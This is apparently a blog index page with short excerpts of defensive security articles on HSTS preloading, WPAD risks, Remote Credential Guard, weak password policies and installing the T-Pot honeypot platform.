Security

HSTS directs the browser to use HTTPS for certain domains (optionally subdomains). This mitigates some MitM attacks by upgrading HTTP connections to HTTPS. HSTS Preloading The native implementation of HSTS communicates the HSTS policy to the browser via an HTTP response header Strict-Transport-Security: max-age=31536000; includeSubDomains. HSTS requires a user to visit a website once before HSTS protection is cached. But what if HTTP is used on the first visit or a user clears their cache frequently? An attacker can still redirect the user to a malicious site by altering the response. ...

What is WPAD? WPAD stands for Windows Proxy Auto-Discovery. It is a protocol to obtain the URL for a PAC file. WPAD uses the following methods in order to discover the PAC file URL: DHCP DNS WINS LLMNR NetBIOS Hosts Lmhosts The PAC file tells the host where to direct network traffic. This is usually used to force traffic through a web proxy. Why is it insecure? When DHCP or DNS is misconfigured or not configured, an attacker can provide the client with a PAC file that directs traffic to a compromised server. ...

Summary Remote Credential Guard (RCG) protects admin credentials by ensuring they are not passed over the network to a target device. RCG is particularly useful for administrators who need to remotely access and manage servers and other critical systems. By ensuring that credentials are not exposed during these remote sessions, it significantly reduces the risk of credential theft and lateral movement in the network. Details Clients with RCG enabled do not send primary credentials to the target machine. This mitigates the risk of stolen credentials if the target is compromised. ...

Problem Statement Accounts with bad passwords, especially accounts with privileged access are the Achilles heel of an organisation’s security. Traditionally IT has tried to impose “strong password policies” such as “Choose a password with an uppercase letter, a number, a symbol and more than 10 characters”. However, a password like “Summer2020!” satisfies ALL those requirements despite being an immesurably weak password. So, what can we as IT professionals do to reduce bad passwords and mitigate their impact? ...

Summary Tpotce is an all-in-one honeypot platform with a collection of honeypots and tools for monitoring them. Requirements 8GB RAM 128GB Disk Space Unfiltered Internet Access Isolated Subnet Promiscious Mode Enabled for fatt, suricata and p0f to work properly Port forward or NAT to the honeypot Installation Set up is simple as the ISO is prebuilt. Download the latest ISO from Tpotce releases Mount the ISO to a VM and run through the installer. Select “Standard” as an install option. The install should take around 30 minutes. Network Configuration Isolated Subnet To prevent attackers from accessing your internal network via the honeypot, you need to create an isolated subnet. ...